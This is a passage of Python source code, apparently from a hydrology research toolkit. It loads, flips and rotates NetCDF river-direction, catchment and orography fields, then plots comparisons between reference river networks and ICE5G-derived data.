**data_original_scale_grid_kwargs),
output_grid_type=grid_type,
method='CheckValue',
output_grid_kwargs=grid_kwargs,
scalenumbers=False).get_data()
else:
data_rdirs_field = iohlpr.NetCDF4FileIOHelper.load_field(data_rdirs_filepath,grid_type,
**grid_kwargs)
else:
data_rdirs_field = None
if ref_orog_filename:
ref_orog_field = iohlpr.NetCDF4FileIOHelper.load_field(ref_orog_filepath,grid_type,
**grid_kwargs)
ref_orog_field = np.ma.array(ref_orog_field)
if data_orog_original_scale_filename:
data_orog_original_scale_field = iohlpr.NetCDF4FileIOHelper.\
load_field(data_orog_original_scale_filepath,
grid_type=data_original_scale_grid_type,
**data_original_scale_grid_kwargs)
fine_grid = grid.makeGrid(data_original_scale_grid_type,
**data_original_scale_grid_kwargs)
if flip_orog_original_scale_relative_to_data:
#This is an extra flip along with the flip applied below
data_orog_original_scale_field = np.flipud(data_orog_original_scale_field)
else:
fine_grid = ref_grid
if super_fine_orog_filename:
super_fine_orog_field = iohlpr.NetCDF4FileIOHelper.\
load_field(super_fine_orog_filepath,
grid_type=super_fine_orog_grid_type,
**super_fine_orog_grid_kwargs)
super_fine_grid = grid.makeGrid(super_fine_orog_grid_type,
**super_fine_orog_grid_kwargs)
if super_fine_data_flowmap_filename:
super_fine_data_flowmap = iohlpr.NetCDF4FileIOHelper.\
load_field(super_fine_data_flowmap_filepath,
grid_type=super_fine_orog_grid_type,
**super_fine_orog_grid_kwargs)
else:
super_fine_data_flowmap = None
if flip_super_fine_orog:
super_fine_orog_field = np.flipud(super_fine_orog_field)
if super_fine_data_flowmap is not None:
super_fine_data_flowmap = np.flipud(super_fine_data_flowmap)
if rotate_super_fine_orog:
super_fine_orog_field = np.roll(super_fine_orog_field,
np.size(super_fine_orog_field,
axis=1)/2,
axis=1)
if super_fine_data_flowmap is not None:
super_fine_data_flowmap = np.roll(super_fine_data_flowmap,
np.size(super_fine_data_flowmap,
axis=1)/2,
axis=1)
else:
super_fine_orog_field = None
super_fine_data_flowmap = None
super_fine_grid = ref_grid
if external_ls_mask_filename:
external_ls_mask = iohlpr.NetCDF4FileIOHelper.\
load_field(external_ls_mask_filepath,
grid_type=grid_type,
**grid_kwargs)
else:
external_ls_mask = None
if flip_ref_field:
ref_flowtocellfield = np.flipud(ref_flowtocellfield)
rdirs_field = np.flipud(rdirs_field)
if ref_catchment_filename:
ref_catchment_field = np.flipud(ref_catchment_field)
if use_original_scale_field_for_determining_data_and_ref_labels:
ref_original_scale_flowtocellfield = np.flipud(ref_original_scale_flowtocellfield)
ref_catchment_field_original_scale = np.flipud(ref_catchment_field_original_scale)
if flip_data_field:
data_flowtocellfield = np.flipud(data_flowtocellfield)
if data_rdirs_filename:
data_rdirs_field = np.flipud(data_rdirs_field)
if data_catchment_filename:
data_catchment_field = np.flipud(data_catchment_field)
if catchment_grid_changed:
data_original_scale_flowtocellfield = np.flipud(data_original_scale_flowtocellfield)
data_catchment_field_original_scale = np.flipud(data_catchment_field_original_scale)
if data_orog_original_scale_filename:
data_orog_original_scale_field = np.flipud(data_orog_original_scale_field)
if rotate_ref_field:
ref_flowtocellfield = np.roll(ref_flowtocellfield,
np.size(ref_flowtocellfield,axis=1)/2,
axis=1)
rdirs_field = np.roll(rdirs_field,
np.size(rdirs_field,axis=1)/2,
axis=1)
if ref_catchment_filename:
ref_catchment_field = np.roll(ref_catchment_field,
np.size(ref_catchment_field,axis=1)/2,
axis=1)
if use_original_scale_field_for_determining_data_and_ref_labels:
ref_original_scale_flowtocellfield = np.roll(ref_original_scale_flowtocellfield,
np.size(ref_original_scale_flowtocellfield,
axis=1)/2,
axis=1)
ref_catchment_field_original_scale = np.roll(ref_catchment_field_original_scale,
np.size(ref_catchment_field_original_scale,
axis=1)/2,
axis=1)
if rotate_data_field:
data_flowtocellfield = np.roll(data_flowtocellfield,
np.size(data_flowtocellfield,axis=1)/2,
axis=1)
if data_rdirs_filename:
data_rdirs_field = np.roll(data_rdirs_field,
np.size(data_rdirs_field,axis=1)/2,
axis=1)
if data_catchment_filename:
data_catchment_field = np.roll(data_catchment_field,
np.size(data_catchment_field,axis=1)/2,
axis=1)
if catchment_grid_changed:
data_original_scale_flowtocellfield = np.roll(data_original_scale_flowtocellfield,
np.size(data_original_scale_flowtocellfield,
axis=1)/2,
axis=1)
data_catchment_field_original_scale = np.roll(data_catchment_field_original_scale,
np.size(data_catchment_field_original_scale,
axis=1)/2,
axis=1)
if data_orog_original_scale_filename:
data_orog_original_scale_field = np.roll(data_orog_original_scale_field,
np.size(data_orog_original_scale_field,
axis=1)/2,
axis=1)
else:
data_orog_original_scale_field = None
if flip_external_ls_mask:
external_ls_mask = np.flipud(external_ls_mask)
if rotate_external_ls_mask:
external_ls_mask = np.roll(external_ls_mask,
np.size(external_ls_mask,
axis=1)/2,
axis=1)
temp_file_list = []
if catchment_and_outflows_mods_list_filename:
ref_outflow_field = iodriver.load_field(reference_rmouth_outflows_filename,
file_type=iodriver.\
get_file_extension(reference_rmouth_outflows_filename),
field_type='Generic', grid_type=grid_type,**grid_kwargs)
data_outflow_field = iodriver.load_field(data_rmouth_outflows_filename,
file_type=iodriver.\
get_file_extension(data_rmouth_outflows_filename),
field_type='Generic', grid_type=grid_type,**grid_kwargs)
if flip_ref_field:
ref_outflow_field.flip_data_ud()
if rotate_ref_field:
ref_outflow_field.rotate_field_by_a_hundred_and_eighty_degrees()
if flip_data_field:
data_outflow_field.flip_data_ud()
if rotate_data_field:
data_outflow_field.rotate_field_by_a_hundred_and_eighty_degrees()
ref_catchment_field, ref_outflow_field, data_catchment_field, data_outflow_field =\
rc_pts.modify_catchments_and_outflows(ref_catchments=ref_catchment_field,
ref_outflows=ref_outflow_field,
ref_flowmap=ref_flowtocellfield,
ref_rdirs = rdirs_field,
data_catchments=data_catchment_field,
data_outflows=data_outflow_field,
catchment_and_outflows_modifications_list_filename=\
catchment_and_outflows_mods_list_filepath,
original_scale_catchment=\
data_catchment_field_original_scale,
original_scale_flowmap=\
data_original_scale_flowtocellfield,
catchment_grid_changed=catchment_grid_changed,
swap_ref_and_data_when_finding_labels=\
swap_ref_and_data_when_finding_labels,
original_scale_grid_type=\
data_original_scale_grid_type,
original_scale_grid_kwargs=\
data_original_scale_grid_kwargs,
grid_type=grid_type,**grid_kwargs)
if flip_data_field:
data_outflow_field.flip_data_ud()
if rotate_data_field:
data_outflow_field.rotate_field_by_a_hundred_and_eighty_degrees()
if flip_ref_field:
ref_outflow_field.flip_data_ud()
if rotate_ref_field:
ref_outflow_field.rotate_field_by_a_hundred_and_eighty_degrees()
reference_rmouth_outflows_filename=os.path.join(self.scratch_dir,
self.temp_label + os.path.\
basename(reference_rmouth_outflows_filename))
data_rmouth_outflows_filename=os.path.join(self.scratch_dir,
self.temp_label + os.path.\
basename(reference_rmouth_outflows_filename))
temp_file_list.append(reference_rmouth_outflows_filename)
temp_file_list.append(data_rmouth_outflows_filename)
iodriver.write_field(reference_rmouth_outflows_filename,
field=ref_outflow_field,
file_type=iodriver.\
get_file_extension(reference_rmouth_outflows_filename))
iodriver.write_field(data_rmouth_outflows_filename,
field=data_outflow_field,
file_type=iodriver.\
get_file_extension(data_rmouth_outflows_filename))
matchedpairs, unresolved_conflicts = mtch_rm.main(reference_rmouth_outflows_filename=\
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename=\
data_rmouth_outflows_filename,
grid_type=grid_type,
flip_data_field=flip_data_field,
rotate_data_field=rotate_data_field,
flip_ref_field=flip_ref_field,
rotate_ref_field=rotate_ref_field,
param_set=matching_parameter_set,
**grid_kwargs)
if additional_matches_list_filename:
additional_matches = mtch_rm.load_additional_manual_matches(additional_matches_list_filepath,
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename,
flip_data_field=flip_data_field,
rotate_data_field=rotate_data_field,
grid_type='HD',**grid_kwargs)
matchedpairs.extend(additional_matches)
if ref_orog_filename:
ref_orog_field[rdirs_field <= 0] = np.ma.masked
interactive_plots = Interactive_Plots()
if return_simple_catchment_and_flowmap_plotters and plot_simple_catchment_and_flowmap_plots:
simple_catchment_and_flowmap_plotters = []
if return_catchment_plotters:
catchment_plotters = []
for pair in matchedpairs:
if pair[0].get_lat() > 310:
continue
if select_only_rivers_in == "North America":
if(pair[0].get_lat() > 156 or pair[0].get_lon() > 260):
continue
print("Ref Point: " + str(pair[0]) + "Matches: " + str(pair[1]))
if rivers_to_plot is not None:
if not (pair[0].get_lat(),pair[0].get_lon()) in rivers_to_plot:
continue
if split_comparison_plots_across_multiple_canvases:
plt.figure(figsize=(25,6.25))
ax = plt.subplot(121)
plt.tight_layout()
else:
plt.figure(figsize=(25,12.5))
ax = plt.subplot(222)
rc_pts.plot_river_rmouth_flowmap(ax=ax,
ref_flowtocellfield=ref_flowtocellfield,
data_flowtocellfield=data_flowtocellfield,
rdirs_field=rdirs_field,
pair=pair,colors=self.colors)
if split_comparison_plots_across_multiple_canvases:
ax_hist = plt.subplot(122)
plt.figure(figsize=(12.5,12.5))
ax_catch = plt.subplot(111)
plt.tight_layout(rect=(0,0,0.9,1))
else:
ax_hist = plt.subplot(221)
ax_catch = plt.subplot(223)
plot_catchment_and_histogram_output = \
rc_pts.plot_catchment_and_histogram_for_river(ax_hist=ax_hist,ax_catch=ax_catch,
ref_catchment_field=ref_catchment_field,
data_catchment_field=data_catchment_field,
data_catchment_field_original_scale=\
data_catchment_field_original_scale,
data_original_scale_flowtocellfield=\
data_original_scale_flowtocellfield,
rdirs_field=rdirs_field,
data_rdirs_field=data_rdirs_field,pair=pair,
catchment_grid_changed=catchment_grid_changed,
swap_ref_and_data_when_finding_labels=\
swap_ref_and_data_when_finding_labels,
colors=self.colors,
ref_grid=ref_grid,
grid_type=grid_type,
alternative_catchment_bounds=\
alternative_catchment_bounds,
use_simplified_catchment_colorscheme=\
use_simplified_catchment_colorscheme,
use_upscaling_labels=\
use_upscaling_labels,
allow_new_sink_points=\
allow_new_true_sinks,
external_landsea_mask=\
external_ls_mask,
ref_original_scale_flowtocellfield=\
ref_original_scale_flowtocellfield,
ref_catchment_field_original_scale=\
ref_catchment_field_original_scale,
use_original_scale_field_for_determining_data_and_ref_labels=\
use_original_scale_field_for_determining_data_and_ref_labels,
return_catchment_plotter=\
return_catchment_plotters,
data_original_scale_grid_type=\
data_original_scale_grid_type,
ref_original_scale_grid_type=\
ref_original_scale_grid_type,
data_original_scale_grid_kwargs=\
data_original_scale_grid_kwargs,
ref_original_scale_grid_kwargs=\
ref_original_scale_grid_kwargs,
**grid_kwargs)
if return_catchment_plotters:
catchment_section,catchment_bounds,scale_factor,catchment_plotter =\
plot_catchment_and_histogram_output
catchment_plotters.append(catchment_plotter)
else:
catchment_section,catchment_bounds,scale_factor = plot_catchment_and_histogram_output
if split_comparison_plots_across_multiple_canvases:
plt.figure(figsize=(12.5,12.5))
ax = plt.subplot(111)
plt.tight_layout(rect=(0,0,0.9,1))
else:
ax = plt.subplot(224)
rc_pts.plot_whole_river_flowmap(ax=ax,pair=pair,ref_flowtocellfield=ref_flowtocellfield,
data_flowtocellfield=data_flowtocellfield,
rdirs_field=rdirs_field,data_rdirs_field=data_rdirs_field,
catchment_bounds=catchment_bounds,colors=self.colors,
simplified_flowmap_plot=use_simplified_flowmap_colorscheme,
allow_new_sink_points=allow_new_true_sinks)
if plot_simple_catchment_and_flowmap_plots:
simple_candf_plt = plt.figure(figsize=(10,6))
simple_ref_ax = plt.subplot(121)
simple_data_ax = plt.subplot(122)
flowtocell_threshold = 75
plotters = rc_pts.simple_catchment_and_flowmap_plots(fig=simple_candf_plt,
ref_ax=simple_ref_ax,
data_ax=simple_data_ax,
ref_catchment_field=ref_catchment_field,
data_catchment_field=data_catchment_field,
data_catchment_field_original_scale=\
data_catchment_field_original_scale,
ref_flowtocellfield=ref_flowtocellfield,
data_flowtocellfield=data_flowtocellfield,
data_original_scale_flowtocellfield=\
data_original_scale_flowtocellfield,
pair=pair,catchment_bounds=catchment_bounds,
flowtocell_threshold=flowtocell_threshold,
catchment_grid_changed=catchment_grid_changed,
colors=self.colors,
external_ls_mask=external_ls_mask,
grid_type=grid_type,
data_original_scale_grid_type=\
data_original_scale_grid_type,
data_original_scale_grid_kwargs=\
data_original_scale_grid_kwargs,**grid_kwargs)
if return_simple_catchment_and_flowmap_plotters:
simple_catchment_and_flowmap_plotters.append(plotters)
if ref_orog_filename and data_orog_original_scale_filename:
if super_fine_orog_filename:
data_to_super_fine_scale_factor = \
pts.calculate_scale_factor(course_grid_type=data_original_scale_grid_type,
course_grid_kwargs=data_original_scale_grid_kwargs,
fine_grid_type=super_fine_orog_grid_type,
fine_grid_kwargs=super_fine_orog_grid_kwargs)
ref_to_super_fine_scale_factor = data_to_super_fine_scale_factor*scale_factor
else:
ref_to_super_fine_scale_factor=None
interactive_plots.setup_plots(catchment_section,
ref_orog_field,
data_orog_original_scale_field,
ref_flowtocellfield,
data_flowtocellfield,
rdirs_field,
super_fine_orog_field,
super_fine_data_flowmap,
pair, catchment_bounds,
scale_factor,
ref_to_super_fine_scale_factor,
ref_grid_offset_adjustment=ref_grid.\
get_longitude_offset_adjustment(),
fine_grid_offset_adjustment=fine_grid.\
get_longitude_offset_adjustment(),
super_fine_grid_offset_adjustment=super_fine_grid.\
get_longitude_offset_adjustment())
elif ref_orog_filename or data_orog_original_scale_filename:
raise UserWarning("No orography plot generated, require both a reference orography"
" and a data orography to generate an orography plot")
print("Unresolved Conflicts: ")
for conflict in unresolved_conflicts:
print(" Conflict:")
for pair in conflict:
print(" Ref Point" + str(pair[0]) + "Matches" + str(pair[1]))
for temp_file in temp_file_list:
if os.path.basename(temp_file).startswith("temp_"):
print("Deleting File: {0}".format(temp_file))
os.remove(temp_file)
if return_simple_catchment_and_flowmap_plotters and plot_simple_catchment_and_flowmap_plots:
return simple_catchment_and_flowmap_plotters
if return_catchment_plotters:
return catchment_plotters
def Compare_Corrected_HD_Rdirs_And_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k(self):
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_as_HD_data_ALG4_sinkless_all_points_0k = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k_20160427_134237.nc")
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_as_HD_data_ALG4_sinkless_all_points_0k,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"flowmap_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k_20160427_134237.nc",
"rivdir_vs_1_9_data_from_stefan.nc",
grid_type='HD')
def Compare_Corrected_HD_Rdirs_And_ICE5G_as_HD_data_ALG4_true_sinks_all_points_0k(self):
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_as_HD_data_ALG4_sinkless_all_points_0k = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k_20160608_184931.nc")
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_as_HD_data_ALG4_sinkless_all_points_0k,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"flowmap_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k_20160608_184931.nc",
"rivdir_vs_1_9_data_from_stefan.nc",
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
data_catchment_filename=\
"catchmentmap_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k_20160608_184931.nc",
grid_type='HD')
def Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_sinkless_all_points_0k_directly_upscaled_fields(self):
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows_ICE5G_data_ALG4_sinkless_0k_upscale_riverflows_and_river_mouth_flows_20160502_163323.nc")
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"upscaled/flowmap_ICE5G_data_ALG4_sinkless_0k_upscale_riverflows"
"_and_river_mouth_flows_20160502_163323.nc",
"rivdir_vs_1_9_data_from_stefan.nc",
flip_data_field=True,
rotate_data_field=True,
super_fine_orog_filename="ETOPO1_Ice_c_gmt4.nc",
flip_super_fine_orog=True,
rotate_super_fine_orog=False,
super_fine_orog_grid_type='LatLong1min',
grid_type='HD')
def Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_true_sinks_all_points_0k_directly_upscaled_fields(self):
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows__ICE5G_data_ALG4_sinkless_0k_upscale_riverflows_and_river_mouth_flows_20160603_112520.nc")
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"upscaled/flowmap__ICE5G_data_ALG4_sinkless_0k_upscale_riverflows"
"_and_river_mouth_flows_20160603_112520.nc",
"rivdir_vs_1_9_data_from_stefan.nc",
flip_data_field=True,
rotate_data_field=True,
data_rdirs_filename="generated/"
"updated_RFDs_ICE5G_data_ALG4_sinkless_0k_20160603_112512.nc",
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
data_catchment_filename=\
"upscaled/catchmentmap_unsorted__ICE5G_data_ALG4_sinkless_0k_upscale_riverflows"
"_and_river_mouth_flows_20160704_152025.nc",
data_catchment_original_scale_filename=\
"catchmentmap_unsorted_ICE5G_data_ALG4_sinkless_0k_20160603_112512.nc",
data_original_scale_flow_map_filename=\
"flowmap_ICE5G_data_ALG4_sinkless_0k_20160603_112512.nc",
ref_orog_filename="topo_hd_vs1_9_data_from_stefan.nc",
data_orog_original_scale_filename=
"ice5g_v1_2_00_0k_10min.nc",
additional_matches_list_filename=\
'additional_matches_ice5g_10min.txt',
super_fine_orog_filename="ETOPO1_Ice_c_gmt4.nc",
flip_super_fine_orog=True,
rotate_super_fine_orog=False,
super_fine_orog_grid_type='LatLong1min',
grid_type='HD',data_original_scale_grid_type='LatLong10min')
def Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_corr_orog_all_points_0k_directly_upscaled_fields(self):
data_creation_datetime="20160802_112138"
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows_ICE5G_data_ALG4_sinkless_0k_{0}.nc".format(data_creation_datetime))
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"upscaled/flowmap_ICE5G_data_ALG4_sinkless_0k_{0}.nc".\
format(data_creation_datetime),
"rivdir_vs_1_9_data_from_stefan.nc",
flip_data_field=True,
rotate_data_field=True,
data_rdirs_filename="generated/"
"updated_RFDs_ICE5G_data_ALG4_sinkless_0k_{0}.nc".\
format(data_creation_datetime),
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
data_catchment_filename=\
"upscaled/catchmentmap_unsorted_ICE5G_data_ALG4_sinkless_0k_{0}.nc".\
format(data_creation_datetime),
data_catchment_original_scale_filename=\
"catchmentmap_unsorted_ICE5G_data_ALG4_sinkless_0k_{0}.nc".\
format(data_creation_datetime),
data_original_scale_flow_map_filename=\
"flowmap_ICE5G_data_ALG4_sinkless_0k_{0}.nc".\
format(data_creation_datetime),
ref_orog_filename="topo_hd_vs1_9_data_from_stefan.nc",
data_orog_original_scale_filename=
"generated/corrected/"
"corrected_orog_ICE5G_data_ALG4_sinkless_0k_{0}.nc".\
format(data_creation_datetime),
additional_matches_list_filename=\
'additional_matches_ice5g_10min.txt',
super_fine_orog_filename="ETOPO1_Ice_c_gmt4.nc",
super_fine_data_flowmap_filename=
"flowmap_etopo1_data_ALG4_sinkless_20160603_112520.nc",
flip_super_fine_orog=True,
rotate_super_fine_orog=False,
super_fine_orog_grid_type='LatLong1min',
grid_type='HD',data_original_scale_grid_type='LatLong10min')
def Compare_Corrected_HD_Rdirs_And_ICE5G_ALG4_corr_orog_downscaled_ls_mask_all_points_0k_directly_upscaled_fields(self):
#data_creation_datetime="20160930_001057" #original rdirs from the original complete corrected orography
data_creation_datetime="20170514_104220" #Version with Amu Darya added
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".format(data_creation_datetime))
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"upscaled/flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
"rivdir_vs_1_9_data_from_stefan.nc",
#It is no longer required to flip data when using 2017 or later data files
flip_data_field=False,
rotate_data_field=True,
data_rdirs_filename="generated/"
"updated_RFDs_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
data_catchment_filename=\
"upscaled/catchmentmap_unsorted_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
data_catchment_original_scale_filename=\
"catchmentmap_unsorted_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
data_original_scale_flow_map_filename=\
"flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
ref_orog_filename="topo_hd_vs1_9_data_from_stefan.nc",
data_orog_original_scale_filename=
"generated/corrected/"
"corrected_orog_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
additional_matches_list_filename=\
'additional_matches_ice5g_10min.txt',
catchment_and_outflows_mods_list_filename='catch_and_outflow_mods_ice5g_10min.txt',
super_fine_orog_filename="ETOPO1_Ice_c_gmt4.nc",
super_fine_data_flowmap_filename=
"flowmap_etopo1_data_ALG4_sinkless_20160603_112520.nc",
flip_super_fine_orog=True,
rotate_super_fine_orog=False,
super_fine_orog_grid_type='LatLong1min',
grid_type='HD',data_original_scale_grid_type='LatLong10min')
def Compare_ICE5G_with_and_without_tarasov_upscaled_srtm30_ALG4_corr_orog_0k_directly_upscaled_fields(self):
data_creation_datetime_with_tarasov="20170511_121440"
data_creation_datetime_ICE5G_alone="20170505_144847"
data_creation_datetime_ICE5G_alone_upscaled="20170507_135726"
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field_without_tarasov_ups_data =\
os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".format(data_creation_datetime_ICE5G_alone))
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field_with_tarasov_ups_data = \
os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless_"
"downscaled_ls_mask_0k_{0}.nc".format(data_creation_datetime_with_tarasov))
self.OutFlowComparisonPlotHelpers(ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field_without_tarasov_ups_data,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field_with_tarasov_ups_data,
"upscaled/flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_ICE5G_alone),
"upscaled/flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_data_"
"ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_with_tarasov),
"generated/upscaled/upscaled_rdirs_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k"
"_upscale_rdirs_{0}_updated.nc".\
format(data_creation_datetime_ICE5G_alone_upscaled),
flip_data_field=False,rotate_data_field=True,
flip_ref_field=False,rotate_ref_field=True,
data_rdirs_filename="generated/"
"updated_RFDs_ICE5G_and_tarasov_upscaled_srtm30plus_data"
"_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_with_tarasov),
ref_catchment_filename=\
"upscaled/catchmentmap_unsorted_ICE5G_data_ALG4"
"_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_ICE5G_alone),
data_catchment_filename=\
"upscaled/catchmentmap_unsorted_ICE5G_and_tarasov_upscaled_srtm30plus_"
"data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_with_tarasov),
data_catchment_original_scale_filename=\
"catchmentmap_unsorted_ICE5G_and_tarasov_upscaled_srtm30plus_data_"
"ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_with_tarasov),
data_original_scale_flow_map_filename=\
"flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless"
"_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_with_tarasov),
flip_orog_original_scale_relative_to_data=True,
ref_orog_filename="topo_hd_vs1_9_data_from_stefan.nc",
data_orog_original_scale_filename=
"generated/corrected/"
"corrected_orog_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless_"
"downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_with_tarasov),
super_fine_orog_filename="ETOPO1_Ice_c_gmt4.nc",
super_fine_data_flowmap_filename=
"flowmap_etopo1_data_ALG4_sinkless_20160603_112520.nc",
flip_super_fine_orog=True,
rotate_super_fine_orog=False,
select_only_rivers_in="North America",
allow_new_true_sinks=True,
use_original_scale_field_for_determining_data_and_ref_labels=True,
ref_original_scale_flow_map_filename="flowmap_ICE5G_data_ALG4_sinkless_"
"downscaled_ls_mask_0k_{0}.nc".format(data_creation_datetime_ICE5G_alone),
ref_catchment_original_scale_filename=
"catchmentmap_unsorted_ICE5G_data_ALG4_"
"sinkless_downscaled_ls_mask_0k_{0}.nc".format(data_creation_datetime_ICE5G_alone),
matching_parameter_set='magnitude_extensive',
super_fine_orog_grid_type='LatLong1min',
grid_type='HD',data_original_scale_grid_type='LatLong10min',
ref_original_scale_grid_type='LatLong10min')
def Compare_Corrected_HD_Rdirs_And_ICE5G_plus_tarasov_upscaled_srtm30_ALG4_corr_orog_0k_directly_upscaled_fields(self):
data_creation_datetime="20170506_105104"
corrected_hd_rdirs_rmouthoutflow_file = os.path.join(self.rmouth_outflow_data_directory,
"rmouthflows_corrected_HD_rdirs_post_processing_20160427_141158.nc")
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field = os.path.join(self.rmouth_outflow_data_directory,
"upscaled/rmouthflows_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless_"
"downscaled_ls_mask_0k_{0}.nc".format(data_creation_datetime))
self.OutFlowComparisonPlotHelpers(corrected_hd_rdirs_rmouthoutflow_file,
ice5g_ALG4_sinkless_all_points_0k_dir_upsc_field,
"flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
"upscaled/flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_data_"
"ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
"rivdir_vs_1_9_data_from_stefan.nc",
flip_data_field=False,
rotate_data_field=True,
data_rdirs_filename="generated/"
"updated_RFDs_ICE5G_and_tarasov_upscaled_srtm30plus_data"
"_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
ref_catchment_filename=\
"catchmentmap_corrected_HD_rdirs_post_processing_20160427_141158.nc",
data_catchment_filename=\
"upscaled/catchmentmap_unsorted_ICE5G_and_tarasov_upscaled_srtm30plus_"
"data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
data_catchment_original_scale_filename=\
"catchmentmap_unsorted_ICE5G_and_tarasov_upscaled_srtm30plus_data_"
"ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
data_original_scale_flow_map_filename=\
"flowmap_ICE5G_and_tarasov_upscaled_srtm30plus_data_ALG4_sinkless"
"_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime),
flip_orog_original_scale_relative_to_data=True,
ref_orog_filename="topo_hd_vs1_9_data_from_stefan.nc",
data_orog_original_scale_filename=
"generated/corrected/"
